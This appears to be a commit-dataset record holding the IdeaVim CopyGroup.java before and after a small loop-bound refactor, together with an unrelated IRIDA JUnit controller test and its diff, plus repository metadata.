com.maddyhome.idea.vim.command.Argument; import com.maddyhome.idea.vim.command.Command; import com.maddyhome.idea.vim.command.CommandState; import com.maddyhome.idea.vim.command.SelectionType; import com.maddyhome.idea.vim.common.Register; import com.maddyhome.idea.vim.common.TextRange; import com.maddyhome.idea.vim.handler.CaretOrder; import com.maddyhome.idea.vim.helper.EditorHelper; import org.jetbrains.annotations.NotNull; import org.jetbrains.annotations.Nullable; import java.util.*; /** * This group works with command associated with copying and pasting text */ public class CopyGroup { /** * Creates the group */ public CopyGroup() { } /** * This yanks the text moved over by the motion command argument. * * @param editor The editor to yank from * @param context The data context * @param count The number of times to yank * @param rawCount The actual count entered by the user * @param argument The motion command argument * @return true if able to yank the text, false if not */ public boolean yankMotion(@NotNull Editor editor, DataContext context, int count, int rawCount, @NotNull Argument argument) { final Command motion = argument.getMotion(); if (motion == null) return false; final CaretModel caretModel = editor.getCaretModel(); final List<Pair<Integer, Integer>> ranges = new ArrayList<>(caretModel.getCaretCount()); final Map<Caret, Integer> startOffsets = new HashMap<>(caretModel.getCaretCount()); for (Caret caret : caretModel.getAllCarets()) { final TextRange motionRange = MotionGroup.getMotionRange(editor, caret, context, count, rawCount, argument, true); if (motionRange == null) continue; assert motionRange.size() == 1; ranges.add(new Pair<>(motionRange.getStartOffset(), motionRange.getEndOffset())); startOffsets.put(caret, motionRange.normalize().getStartOffset()); } final SelectionType type = SelectionType.fromCommandFlags(motion.getFlags()); final TextRange range = getTextRange(ranges, type); final SelectionType selectionType = type == SelectionType.CHARACTER_WISE && range.isMultiple() ? 
SelectionType.BLOCK_WISE : type; return yankRange(editor, range, selectionType, startOffsets); } /** * This yanks count lines of text * * @param editor The editor to yank from * @param count The number of lines to yank * @return true if able to yank the lines, false if not */ public boolean yankLine(@NotNull Editor editor, int count) { final CaretModel caretModel = editor.getCaretModel(); final List<Pair<Integer, Integer>> ranges = new ArrayList<>(caretModel.getCaretCount()); for (Caret caret : caretModel.getAllCarets()) { final int start = VimPlugin.getMotion().moveCaretToLineStart(editor, caret); final int end = Math.min(VimPlugin.getMotion().moveCaretToLineEndOffset(editor, caret, count - 1, true) + 1, EditorHelper.getFileSize(editor)); if (end == -1) continue; ranges.add(new Pair<>(start, end)); } final TextRange range = getTextRange(ranges, SelectionType.LINE_WISE); return yankRange(editor, range, SelectionType.LINE_WISE, null); } /** * This yanks a range of text * * @param editor The editor to yank from * @param range The range of text to yank * @param type The type of yank * @return true if able to yank the range, false if not */ public boolean yankRange(@NotNull Editor editor, @Nullable TextRange range, @NotNull SelectionType type, boolean moveCursor) { if (range != null) { boolean res = VimPlugin.getRegister().storeText(editor, range, type, false); if (moveCursor) { MotionGroup.moveCaret(editor, editor.getCaretModel().getPrimaryCaret(), range.normalize().getStartOffset()); } return res; } return false; } /** * Pastes text from the last register into the editor. * * @param editor The editor to paste into * @param context The data context * @param count The number of times to perform the paste * @return true if able to paste, false if not */ public boolean putText(@NotNull Editor editor, @NotNull DataContext context, int count, boolean indent, boolean cursorAfter, boolean beforeCursor) { final Register register = VimPlugin.getRegister().getLastRegister(); if (register == null) return false; final SelectionType type = register.getType(); if (type == SelectionType.LINE_WISE && editor.isOneLineMode()) return false; final String text = register.getText(); for (Caret caret : EditorHelper.getOrderedCaretsList(editor, CaretOrder.DECREASING_OFFSET)) { final int startOffset = getStartOffset(editor, caret, type, beforeCursor); if (text == null) { VimPlugin.getMark().setMark(editor, MarkGroup.MARK_CHANGE_POS, startOffset); VimPlugin.getMark().setChangeMarks(editor, new TextRange(startOffset, startOffset)); continue; } putText(editor, caret, context, text, type, CommandState.SubMode.NONE, startOffset, count, indent, cursorAfter); } return true; } public boolean putVisualRange(@NotNull Editor editor, @NotNull DataContext context, @NotNull TextRange range, int count, boolean indent, boolean cursorAfter) { final Register register = VimPlugin.getRegister().getLastRegister(); VimPlugin.getRegister().resetRegister(); if (register == null) return false; final SelectionType type = register.getType(); if (type == SelectionType.LINE_WISE && editor.isOneLineMode()) return false; final int start = range.getStartOffset(); final int end = range.getEndOffset(); final int endLine = editor.offsetToLogicalPosition(end).line; final CommandState.SubMode subMode = CommandState.getInstance(editor).getSubMode(); if (subMode == CommandState.SubMode.VISUAL_LINE) { range = new TextRange(range.getStartOffset(), Math.min(range.getEndOffset() + 1, EditorHelper.getFileSize(editor))); } final Caret caret = 
editor.getCaretModel().getPrimaryCaret(); VimPlugin.getChange().deleteRange(editor, caret, range, SelectionType.fromSubMode(subMode), false); caret.moveToOffset(start); int startOffset = start; if (type == SelectionType.LINE_WISE) { if (subMode == CommandState.SubMode.VISUAL_BLOCK) { startOffset = editor.getDocument().getLineEndOffset(endLine) + 1; } else if (subMode != CommandState.SubMode.VISUAL_LINE) { editor.getDocument().insertString(start, "\n"); startOffset = start + 1; } } else if (type != SelectionType.CHARACTER_WISE) { if (subMode == CommandState.SubMode.VISUAL_LINE) { editor.getDocument().insertString(start, "\n"); } } putText(editor, caret, context, StringUtil.notNullize(register.getText()), type, subMode, startOffset, count, indent && type == SelectionType.LINE_WISE, cursorAfter); return true; } /** * This performs the actual insert of the paste * * @param editor The editor to paste into * @param context The data context * @param startOffset The location within the file to paste the text * @param text The text to paste * @param type The type of paste * @param count The number of times to paste the text * @param indent True if pasted lines should be autoindented, false if not * @param cursorAfter If true move cursor to just after pasted text * @param mode The type of highlight prior to the put. * @param caret The caret to insert to */ public void putText(@NotNull Editor editor, @NotNull Caret caret, @NotNull DataContext context, @NotNull String text, @NotNull SelectionType type, @NotNull CommandState.SubMode mode, int startOffset, int count, boolean indent, boolean cursorAfter) { if (mode == CommandState.SubMode.VISUAL_LINE && editor.isOneLineMode()) return; if (indent && type != SelectionType.LINE_WISE && mode != CommandState.SubMode.VISUAL_LINE) indent = false; if (type == SelectionType.LINE_WISE && text.length() > 0 && text.charAt(text.length() - 1) != '\n') { text = text + '\n'; } final int endOffset = putTextInternal(editor, caret, context, text, type, mode, startOffset, count, indent); moveCaret(editor, caret, type, mode, startOffset, cursorAfter, endOffset); VimPlugin.getMark().setChangeMarks(editor, new TextRange(startOffset, endOffset)); } private int putTextInternal(@NotNull Editor editor, @NotNull Caret caret, @NotNull DataContext context, @NotNull String text, @NotNull SelectionType type, @NotNull CommandState.SubMode mode, int startOffset, int count, boolean indent) { final int endOffset = type != SelectionType.BLOCK_WISE ? putTextInternal(editor, caret, text, startOffset, count) : putTextInternal(editor, caret, text, mode, startOffset, count); if (indent) return doIndent(editor, caret, context, startOffset, endOffset); return endOffset; } private int putTextInternal(@NotNull Editor editor, @NotNull Caret caret, @NotNull String text, @NotNull CommandState.SubMode mode, int startOffset, int count) { final LogicalPosition startPosition = editor.offsetToLogicalPosition(startOffset); final int currentColumn = mode == CommandState.SubMode.VISUAL_LINE ? 
0 : startPosition.column; int currentLine = startPosition.line; final int lineCount = StringUtil.getLineBreakCount(text) + 1; if (currentLine + lineCount >= EditorHelper.getLineCount(editor)) { final int limit = currentLine + lineCount - EditorHelper.getLineCount(editor); for (int i = 0; i < limit; i++) { MotionGroup.moveCaret(editor, caret, EditorHelper.getFileSize(editor, true)); VimPlugin.getChange().insertText(editor, caret, "\n"); } } final int maxLen = getMaxSegmentLength(text); final StringTokenizer tokenizer = new StringTokenizer(text, "\n"); int endOffset = startOffset; while (tokenizer.hasMoreTokens()) { String segment = tokenizer.nextToken(); String origSegment = segment; if (segment.length() < maxLen) { final int diff = maxLen - segment.length(); final StringBuilder sb = new StringBuilder(segment.length() + diff); sb.append(segment); for (int i = 0; i < diff; i++) sb.append(' '); segment = sb.toString(); if (currentColumn != 0 && currentColumn < EditorHelper.getLineLength(editor, currentLine)) { origSegment = segment; } } final String pad = EditorHelper.pad(editor, currentLine, currentColumn); final int insertOffset = editor.logicalPositionToOffset(new LogicalPosition(currentLine, currentColumn)); MotionGroup.moveCaret(editor, caret, insertOffset); VimPlugin.getChange().insertText(editor, caret, origSegment); endOffset = insertOffset + origSegment.length(); for (int i = 1; i < count; i++) VimPlugin.getChange().insertText(editor, caret, segment); endOffset += segment.length() * count; if (mode == CommandState.SubMode.VISUAL_LINE) { MotionGroup.moveCaret(editor, caret, endOffset); VimPlugin.getChange().insertText(editor, caret, "\n"); ++endOffset; } else { if (pad.length() > 0) { MotionGroup.moveCaret(editor, caret, insertOffset); VimPlugin.getChange().insertText(editor, caret, pad); endOffset += pad.length(); } } ++currentLine; } return endOffset; } private int putTextInternal(@NotNull Editor editor, @NotNull Caret caret, @NotNull String text, int startOffset, int count) { MotionGroup.moveCaret(editor, caret, startOffset); for (int i = 0; i < count; i++) { //TODO: change to stringbuilder? VimPlugin.getChange().insertText(editor, caret, text); } return startOffset + text.length() * count; } private int getStartOffset(@NotNull Editor editor, @NotNull Caret caret, SelectionType type, boolean beforeCursor) { if (beforeCursor) { return type == SelectionType.LINE_WISE ? VimPlugin.getMotion().moveCaretToLineStart(editor, caret) : caret.getOffset(); } int startOffset; if (type == SelectionType.LINE_WISE) { startOffset = Math.min(editor.getDocument().getTextLength(), VimPlugin.getMotion().moveCaretToLineEnd(editor, caret) + 1); if (startOffset > 0 && startOffset == editor.getDocument().getTextLength() && editor.getDocument().getCharsSequence().charAt(startOffset - 1) != '\n') { editor.getDocument().insertString(startOffset, "\n"); startOffset++; } } else { startOffset = caret.getOffset(); if (!EditorHelper.isLineEmpty(editor, caret.getLogicalPosition().line, false)) { startOffset++; } } if (startOffset > 0 && startOffset > editor.getDocument().getTextLength()) return startOffset - 1; return startOffset; } private void moveCaret(@NotNull Editor editor, @NotNull Caret caret, @NotNull SelectionType type, @NotNull CommandState.SubMode mode, int startOffset, boolean cursorAfter, int endOffset) { int cursorMode; if (type == SelectionType.BLOCK_WISE) { if (mode == CommandState.SubMode.VISUAL_LINE) { cursorMode = cursorAfter ? 4 : 1; } else { cursorMode = cursorAfter ? 
5 : 1; } } else if (type == SelectionType.LINE_WISE) { if (mode == CommandState.SubMode.VISUAL_LINE) { cursorMode = cursorAfter ? 4 : 3; } else { cursorMode = cursorAfter ? 4 : 3; } } else /* Characterwise */ { if (mode == CommandState.SubMode.VISUAL_LINE) { cursorMode = cursorAfter ? 4 : 1; } else { cursorMode = cursorAfter ? 5 : 2; } } switch (cursorMode) { case 1: MotionGroup.moveCaret(editor, caret, startOffset); break; case 2: MotionGroup.moveCaret(editor, caret, endOffset - 1); break; case 3: MotionGroup.moveCaret(editor, caret, startOffset); MotionGroup.moveCaret(editor, caret, VimPlugin.getMotion().moveCaretToLineStartSkipLeading(editor, caret)); break; case 4: MotionGroup.moveCaret(editor, caret, endOffset + 1); break; case 5: int pos = Math.min(endOffset, EditorHelper.getLineEndForOffset(editor, endOffset - 1) - 1); MotionGroup.moveCaret(editor, caret, pos); break; } } private int doIndent(@NotNull Editor editor, @NotNull Caret caret, @NotNull DataContext context, int startOffset, int endOffset) { final int startLine = editor.offsetToLogicalPosition(startOffset).line; final int endLine = editor.offsetToLogicalPosition(endOffset - 1).line; final int startLineOffset = editor.getDocument().getLineStartOffset(startLine); final int endLineOffset = editor.getDocument().getLineEndOffset(endLine); VimPlugin.getChange().autoIndentRange(editor, caret, context, new TextRange(startLineOffset, endLineOffset)); return EditorHelper.getLineEndOffset(editor, endLine, true); } private int getMaxSegmentLength(@NotNull String text) { final StringTokenizer tokenizer = new StringTokenizer(text, "\n"); int maxLen = 0; while (tokenizer.hasMoreTokens()) { final String s = tokenizer.nextToken(); maxLen = Math.max(s.length(), maxLen); } return maxLen; } @NotNull private TextRange getTextRange(@NotNull List<Pair<Integer, Integer>> ranges, @NotNull SelectionType type) { final int size = ranges.size(); final int[] starts = new int[size]; final int[] ends = new int[size]; switch (type) { case LINE_WISE: starts[size - 1] = ranges.get(size - 1).first; ends[size - 1] = ranges.get(size - 1).second; for (int i = 0; i < size - 1; i++) { final Pair<Integer, Integer> range = ranges.get(i); starts[i] = range.first; ends[i] = range.second - 1; } break; case CHARACTER_WISE: for (int i = 0; i < size; i++) { final Pair<Integer, Integer> range = ranges.get(i); starts[i] = range.first; ends[i] = range.second; } break; case BLOCK_WISE: assert ranges.size() == 1; } return new TextRange(starts, ends); } private boolean yankRange(@NotNull Editor editor, @NotNull TextRange range, @NotNull SelectionType type, @Nullable Map<Caret, Integer> startOffsets) { if (startOffsets != null) startOffsets.forEach((caret, offset) -> MotionGroup.moveCaret(editor, caret, offset)); return VimPlugin.getRegister().storeText(editor, range, type, false); } }
src/com/maddyhome/idea/vim/group/CopyGroup.java
/* * IdeaVim - Vim emulator for IDEs based on the IntelliJ platform * Copyright (C) 2003-2016 The IdeaVim authors * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ package com.maddyhome.idea.vim.group; import com.intellij.openapi.actionSystem.DataContext; import com.intellij.openapi.editor.Caret; import com.intellij.openapi.editor.CaretModel; import com.intellij.openapi.editor.Editor; import com.intellij.openapi.editor.LogicalPosition; import com.intellij.openapi.util.Pair; import com.intellij.openapi.util.text.StringUtil; import com.maddyhome.idea.vim.VimPlugin; import com.maddyhome.idea.vim.command.Argument; import com.maddyhome.idea.vim.command.Command; import com.maddyhome.idea.vim.command.CommandState; import com.maddyhome.idea.vim.command.SelectionType; import com.maddyhome.idea.vim.common.Register; import com.maddyhome.idea.vim.common.TextRange; import com.maddyhome.idea.vim.handler.CaretOrder; import com.maddyhome.idea.vim.helper.EditorHelper; import org.jetbrains.annotations.NotNull; import org.jetbrains.annotations.Nullable; import java.util.*; /** * This group works with command associated with copying and pasting text */ public class CopyGroup { /** * Creates the group */ public CopyGroup() { } /** * This yanks the text moved over by the motion command argument. * * @param editor The editor to yank from * @param context The data context * @param count The number of times to yank * @param rawCount The actual count entered by the user * @param argument The motion command argument * @return true if able to yank the text, false if not */ public boolean yankMotion(@NotNull Editor editor, DataContext context, int count, int rawCount, @NotNull Argument argument) { final Command motion = argument.getMotion(); if (motion == null) return false; final CaretModel caretModel = editor.getCaretModel(); final List<Pair<Integer, Integer>> ranges = new ArrayList<>(caretModel.getCaretCount()); final Map<Caret, Integer> startOffsets = new HashMap<>(caretModel.getCaretCount()); for (Caret caret : caretModel.getAllCarets()) { final TextRange motionRange = MotionGroup.getMotionRange(editor, caret, context, count, rawCount, argument, true); if (motionRange == null) continue; assert motionRange.size() == 1; ranges.add(new Pair<>(motionRange.getStartOffset(), motionRange.getEndOffset())); startOffsets.put(caret, motionRange.normalize().getStartOffset()); } final SelectionType type = SelectionType.fromCommandFlags(motion.getFlags()); final TextRange range = getTextRange(ranges, type); final SelectionType selectionType = type == SelectionType.CHARACTER_WISE && range.isMultiple() ? 
SelectionType.BLOCK_WISE : type; return yankRange(editor, range, selectionType, startOffsets); } /** * This yanks count lines of text * * @param editor The editor to yank from * @param count The number of lines to yank * @return true if able to yank the lines, false if not */ public boolean yankLine(@NotNull Editor editor, int count) { final CaretModel caretModel = editor.getCaretModel(); final List<Pair<Integer, Integer>> ranges = new ArrayList<>(caretModel.getCaretCount()); for (Caret caret : caretModel.getAllCarets()) { final int start = VimPlugin.getMotion().moveCaretToLineStart(editor, caret); final int end = Math.min(VimPlugin.getMotion().moveCaretToLineEndOffset(editor, caret, count - 1, true) + 1, EditorHelper.getFileSize(editor)); if (end == -1) continue; ranges.add(new Pair<>(start, end)); } final TextRange range = getTextRange(ranges, SelectionType.LINE_WISE); return yankRange(editor, range, SelectionType.LINE_WISE, null); } /** * This yanks a range of text * * @param editor The editor to yank from * @param range The range of text to yank * @param type The type of yank * @return true if able to yank the range, false if not */ public boolean yankRange(@NotNull Editor editor, @Nullable TextRange range, @NotNull SelectionType type, boolean moveCursor) { if (range != null) { boolean res = VimPlugin.getRegister().storeText(editor, range, type, false); if (moveCursor) { MotionGroup.moveCaret(editor, editor.getCaretModel().getPrimaryCaret(), range.normalize().getStartOffset()); } return res; } return false; } /** * Pastes text from the last register into the editor. * * @param editor The editor to paste into * @param context The data context * @param count The number of times to perform the paste * @return true if able to paste, false if not */ public boolean putText(@NotNull Editor editor, @NotNull DataContext context, int count, boolean indent, boolean cursorAfter, boolean beforeCursor) { final Register register = VimPlugin.getRegister().getLastRegister(); if (register == null) return false; final SelectionType type = register.getType(); if (type == SelectionType.LINE_WISE && editor.isOneLineMode()) return false; final String text = register.getText(); for (Caret caret : EditorHelper.getOrderedCaretsList(editor, CaretOrder.DECREASING_OFFSET)) { final int startOffset = getStartOffset(editor, caret, type, beforeCursor); if (text == null) { VimPlugin.getMark().setMark(editor, MarkGroup.MARK_CHANGE_POS, startOffset); VimPlugin.getMark().setChangeMarks(editor, new TextRange(startOffset, startOffset)); continue; } putText(editor, caret, context, text, type, CommandState.SubMode.NONE, startOffset, count, indent, cursorAfter); } return true; } public boolean putVisualRange(@NotNull Editor editor, @NotNull DataContext context, @NotNull TextRange range, int count, boolean indent, boolean cursorAfter) { final Register register = VimPlugin.getRegister().getLastRegister(); VimPlugin.getRegister().resetRegister(); if (register == null) return false; final SelectionType type = register.getType(); if (type == SelectionType.LINE_WISE && editor.isOneLineMode()) return false; final int start = range.getStartOffset(); final int end = range.getEndOffset(); final int endLine = editor.offsetToLogicalPosition(end).line; final CommandState.SubMode subMode = CommandState.getInstance(editor).getSubMode(); if (subMode == CommandState.SubMode.VISUAL_LINE) { range = new TextRange(range.getStartOffset(), Math.min(range.getEndOffset() + 1, EditorHelper.getFileSize(editor))); } final Caret caret = 
editor.getCaretModel().getPrimaryCaret(); VimPlugin.getChange().deleteRange(editor, caret, range, SelectionType.fromSubMode(subMode), false); caret.moveToOffset(start); int startOffset = start; if (type == SelectionType.LINE_WISE) { if (subMode == CommandState.SubMode.VISUAL_BLOCK) { startOffset = editor.getDocument().getLineEndOffset(endLine) + 1; } else if (subMode != CommandState.SubMode.VISUAL_LINE) { editor.getDocument().insertString(start, "\n"); startOffset = start + 1; } } else if (type != SelectionType.CHARACTER_WISE) { if (subMode == CommandState.SubMode.VISUAL_LINE) { editor.getDocument().insertString(start, "\n"); } } putText(editor, caret, context, StringUtil.notNullize(register.getText()), type, subMode, startOffset, count, indent && type == SelectionType.LINE_WISE, cursorAfter); return true; } /** * This performs the actual insert of the paste * * @param editor The editor to paste into * @param context The data context * @param startOffset The location within the file to paste the text * @param text The text to paste * @param type The type of paste * @param count The number of times to paste the text * @param indent True if pasted lines should be autoindented, false if not * @param cursorAfter If true move cursor to just after pasted text * @param mode The type of highlight prior to the put. * @param caret The caret to insert to */ public void putText(@NotNull Editor editor, @NotNull Caret caret, @NotNull DataContext context, @NotNull String text, @NotNull SelectionType type, @NotNull CommandState.SubMode mode, int startOffset, int count, boolean indent, boolean cursorAfter) { if (mode == CommandState.SubMode.VISUAL_LINE && editor.isOneLineMode()) return; if (indent && type != SelectionType.LINE_WISE && mode != CommandState.SubMode.VISUAL_LINE) indent = false; if (type == SelectionType.LINE_WISE && text.length() > 0 && text.charAt(text.length() - 1) != '\n') { text = text + '\n'; } final int endOffset = putTextInternal(editor, caret, context, text, type, mode, startOffset, count, indent); moveCaret(editor, caret, type, mode, startOffset, cursorAfter, endOffset); VimPlugin.getMark().setChangeMarks(editor, new TextRange(startOffset, endOffset)); } private int putTextInternal(@NotNull Editor editor, @NotNull Caret caret, @NotNull DataContext context, @NotNull String text, @NotNull SelectionType type, @NotNull CommandState.SubMode mode, int startOffset, int count, boolean indent) { final int endOffset = type != SelectionType.BLOCK_WISE ? putTextInternal(editor, caret, text, startOffset, count) : putTextInternal(editor, caret, text, mode, startOffset, count); if (indent) return doIndent(editor, caret, context, startOffset, endOffset); return endOffset; } private int putTextInternal(@NotNull Editor editor, @NotNull Caret caret, @NotNull String text, @NotNull CommandState.SubMode mode, int startOffset, int count) { final LogicalPosition startPosition = editor.offsetToLogicalPosition(startOffset); final int currentColumn = mode == CommandState.SubMode.VISUAL_LINE ? 
0 : startPosition.column; int currentLine = startPosition.line; final int lineCount = StringUtil.getLineBreakCount(text) + 1; if (currentLine + lineCount >= EditorHelper.getLineCount(editor)) { for (int i = 0; i < currentLine + lineCount - EditorHelper.getLineCount(editor); i++) { MotionGroup.moveCaret(editor, caret, EditorHelper.getFileSize(editor, true)); VimPlugin.getChange().insertText(editor, caret, "\n"); } } final int maxLen = getMaxSegmentLength(text); final StringTokenizer tokenizer = new StringTokenizer(text, "\n"); int endOffset = startOffset; while (tokenizer.hasMoreTokens()) { String segment = tokenizer.nextToken(); String origSegment = segment; if (segment.length() < maxLen) { final int diff = maxLen - segment.length(); final StringBuilder sb = new StringBuilder(segment.length() + diff); sb.append(segment); for (int i = 0; i < diff; i++) sb.append(' '); segment = sb.toString(); if (currentColumn != 0 && currentColumn < EditorHelper.getLineLength(editor, currentLine)) { origSegment = segment; } } final String pad = EditorHelper.pad(editor, currentLine, currentColumn); final int insertOffset = editor.logicalPositionToOffset(new LogicalPosition(currentLine, currentColumn)); MotionGroup.moveCaret(editor, caret, insertOffset); VimPlugin.getChange().insertText(editor, caret, origSegment); endOffset = insertOffset + origSegment.length(); for (int i = 1; i < count; i++) VimPlugin.getChange().insertText(editor, caret, segment); endOffset += segment.length() * count; if (mode == CommandState.SubMode.VISUAL_LINE) { MotionGroup.moveCaret(editor, caret, endOffset); VimPlugin.getChange().insertText(editor, caret, "\n"); ++endOffset; } else { if (pad.length() > 0) { MotionGroup.moveCaret(editor, caret, insertOffset); VimPlugin.getChange().insertText(editor, caret, pad); endOffset += pad.length(); } } ++currentLine; } return endOffset; } private int putTextInternal(@NotNull Editor editor, @NotNull Caret caret, @NotNull String text, int startOffset, int count) { MotionGroup.moveCaret(editor, caret, startOffset); for (int i = 0; i < count; i++) { //TODO: change to stringbuilder? VimPlugin.getChange().insertText(editor, caret, text); } return startOffset + text.length() * count; } private int getStartOffset(@NotNull Editor editor, @NotNull Caret caret, SelectionType type, boolean beforeCursor) { if (beforeCursor) { return type == SelectionType.LINE_WISE ? VimPlugin.getMotion().moveCaretToLineStart(editor, caret) : caret.getOffset(); } int startOffset; if (type == SelectionType.LINE_WISE) { startOffset = Math.min(editor.getDocument().getTextLength(), VimPlugin.getMotion().moveCaretToLineEnd(editor, caret) + 1); if (startOffset > 0 && startOffset == editor.getDocument().getTextLength() && editor.getDocument().getCharsSequence().charAt(startOffset - 1) != '\n') { editor.getDocument().insertString(startOffset, "\n"); startOffset++; } } else { startOffset = caret.getOffset(); if (!EditorHelper.isLineEmpty(editor, caret.getLogicalPosition().line, false)) { startOffset++; } } if (startOffset > 0 && startOffset > editor.getDocument().getTextLength()) return startOffset - 1; return startOffset; } private void moveCaret(@NotNull Editor editor, @NotNull Caret caret, @NotNull SelectionType type, @NotNull CommandState.SubMode mode, int startOffset, boolean cursorAfter, int endOffset) { int cursorMode; if (type == SelectionType.BLOCK_WISE) { if (mode == CommandState.SubMode.VISUAL_LINE) { cursorMode = cursorAfter ? 4 : 1; } else { cursorMode = cursorAfter ? 
5 : 1; } } else if (type == SelectionType.LINE_WISE) { if (mode == CommandState.SubMode.VISUAL_LINE) { cursorMode = cursorAfter ? 4 : 3; } else { cursorMode = cursorAfter ? 4 : 3; } } else /* Characterwise */ { if (mode == CommandState.SubMode.VISUAL_LINE) { cursorMode = cursorAfter ? 4 : 1; } else { cursorMode = cursorAfter ? 5 : 2; } } switch (cursorMode) { case 1: MotionGroup.moveCaret(editor, caret, startOffset); break; case 2: MotionGroup.moveCaret(editor, caret, endOffset - 1); break; case 3: MotionGroup.moveCaret(editor, caret, startOffset); MotionGroup.moveCaret(editor, caret, VimPlugin.getMotion().moveCaretToLineStartSkipLeading(editor, caret)); break; case 4: MotionGroup.moveCaret(editor, caret, endOffset + 1); break; case 5: int pos = Math.min(endOffset, EditorHelper.getLineEndForOffset(editor, endOffset - 1) - 1); MotionGroup.moveCaret(editor, caret, pos); break; } } private int doIndent(@NotNull Editor editor, @NotNull Caret caret, @NotNull DataContext context, int startOffset, int endOffset) { final int startLine = editor.offsetToLogicalPosition(startOffset).line; final int endLine = editor.offsetToLogicalPosition(endOffset - 1).line; final int startLineOffset = editor.getDocument().getLineStartOffset(startLine); final int endLineOffset = editor.getDocument().getLineEndOffset(endLine); VimPlugin.getChange().autoIndentRange(editor, caret, context, new TextRange(startLineOffset, endLineOffset)); return EditorHelper.getLineEndOffset(editor, endLine, true); } private int getMaxSegmentLength(@NotNull String text) { final StringTokenizer tokenizer = new StringTokenizer(text, "\n"); int maxLen = 0; while (tokenizer.hasMoreTokens()) { final String s = tokenizer.nextToken(); maxLen = Math.max(s.length(), maxLen); } return maxLen; } @NotNull private TextRange getTextRange(@NotNull List<Pair<Integer, Integer>> ranges, @NotNull SelectionType type) { final int size = ranges.size(); final int[] starts = new int[size]; final int[] ends = new int[size]; switch (type) { case LINE_WISE: starts[size - 1] = ranges.get(size - 1).first; ends[size - 1] = ranges.get(size - 1).second; for (int i = 0; i < size - 1; i++) { final Pair<Integer, Integer> range = ranges.get(i); starts[i] = range.first; ends[i] = range.second - 1; } break; case CHARACTER_WISE: for (int i = 0; i < size; i++) { final Pair<Integer, Integer> range = ranges.get(i); starts[i] = range.first; ends[i] = range.second; } break; case BLOCK_WISE: assert ranges.size() == 1; } return new TextRange(starts, ends); } private boolean yankRange(@NotNull Editor editor, @NotNull TextRange range, @NotNull SelectionType type, @Nullable Map<Caret, Integer> startOffsets) { if (startOffsets != null) startOffsets.forEach((caret, offset) -> MotionGroup.moveCaret(editor, caret, offset)); return VimPlugin.getRegister().storeText(editor, range, type, false); } }
Put text bug fixed
src/com/maddyhome/idea/vim/group/CopyGroup.java
Put text bug fixed
<ide><path>rc/com/maddyhome/idea/vim/group/CopyGroup.java <ide> <ide> final int lineCount = StringUtil.getLineBreakCount(text) + 1; <ide> if (currentLine + lineCount >= EditorHelper.getLineCount(editor)) { <del> for (int i = 0; i < currentLine + lineCount - EditorHelper.getLineCount(editor); i++) { <add> final int limit = currentLine + lineCount - EditorHelper.getLineCount(editor); <add> for (int i = 0; i < limit; i++) { <ide> MotionGroup.moveCaret(editor, caret, EditorHelper.getFileSize(editor, true)); <ide> VimPlugin.getChange().insertText(editor, caret, "\n"); <ide> }
Java
apache-2.0
error: pathspec 'src/test/java/ca/corefacility/bioinformatics/irida/ria/unit/web/SequencingRunControllerTest.java' did not match any file(s) known to git
e1d6153a1490b1a9fa7a6c48f74e2a1d773e6d9f
1
phac-nml/irida,phac-nml/irida,phac-nml/irida,phac-nml/irida,phac-nml/irida,phac-nml/irida,phac-nml/irida,phac-nml/irida
package ca.corefacility.bioinformatics.irida.ria.unit.web; import static org.junit.Assert.assertEquals; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.verify; import static org.mockito.Mockito.when; import java.util.List; import org.junit.Before; import org.junit.Test; import ca.corefacility.bioinformatics.irida.model.SequencingRunEntity; import ca.corefacility.bioinformatics.irida.model.run.SequencingRun; import ca.corefacility.bioinformatics.irida.ria.web.SequencingRunController; import ca.corefacility.bioinformatics.irida.service.SequencingRunService; import com.google.common.collect.Lists; public class SequencingRunControllerTest { private SequencingRunController controller; private SequencingRunService sequencingRunService; @Before public void setup() { sequencingRunService = mock(SequencingRunService.class); controller = new SequencingRunController(sequencingRunService); } @Test public void testGetListPage() { assertEquals(SequencingRunController.LIST_VIEW, controller.getListPage()); } @Test public void testGetSequencingRuns() { List<SequencingRun> runs = Lists.newArrayList(new SequencingRunEntity()); when(sequencingRunService.findAll()).thenReturn(runs); Iterable<SequencingRun> sequencingRuns = controller.getSequencingRuns(); verify(sequencingRunService).findAll(); assertEquals(sequencingRuns, runs); } }
src/test/java/ca/corefacility/bioinformatics/irida/ria/unit/web/SequencingRunControllerTest.java
added most boring test
src/test/java/ca/corefacility/bioinformatics/irida/ria/unit/web/SequencingRunControllerTest.java
added most boring test
<ide><path>rc/test/java/ca/corefacility/bioinformatics/irida/ria/unit/web/SequencingRunControllerTest.java <add>package ca.corefacility.bioinformatics.irida.ria.unit.web; <add> <add>import static org.junit.Assert.assertEquals; <add>import static org.mockito.Mockito.mock; <add>import static org.mockito.Mockito.verify; <add>import static org.mockito.Mockito.when; <add> <add>import java.util.List; <add> <add>import org.junit.Before; <add>import org.junit.Test; <add> <add>import ca.corefacility.bioinformatics.irida.model.SequencingRunEntity; <add>import ca.corefacility.bioinformatics.irida.model.run.SequencingRun; <add>import ca.corefacility.bioinformatics.irida.ria.web.SequencingRunController; <add>import ca.corefacility.bioinformatics.irida.service.SequencingRunService; <add> <add>import com.google.common.collect.Lists; <add> <add>public class SequencingRunControllerTest { <add> private SequencingRunController controller; <add> <add> private SequencingRunService sequencingRunService; <add> <add> @Before <add> public void setup() { <add> sequencingRunService = mock(SequencingRunService.class); <add> controller = new SequencingRunController(sequencingRunService); <add> } <add> <add> @Test <add> public void testGetListPage() { <add> assertEquals(SequencingRunController.LIST_VIEW, controller.getListPage()); <add> } <add> <add> @Test <add> public void testGetSequencingRuns() { <add> List<SequencingRun> runs = Lists.newArrayList(new SequencingRunEntity()); <add> when(sequencingRunService.findAll()).thenReturn(runs); <add> Iterable<SequencingRun> sequencingRuns = controller.getSequencingRuns(); <add> verify(sequencingRunService).findAll(); <add> assertEquals(sequencingRuns, runs); <add> } <add>}
Java
apache-2.0
195d00308576065420af92c361522ee8fcb94ff0
0
baszero/yanel,baszero/yanel,wyona/yanel,baszero/yanel,baszero/yanel,baszero/yanel,wyona/yanel,wyona/yanel,wyona/yanel,wyona/yanel,baszero/yanel,wyona/yanel
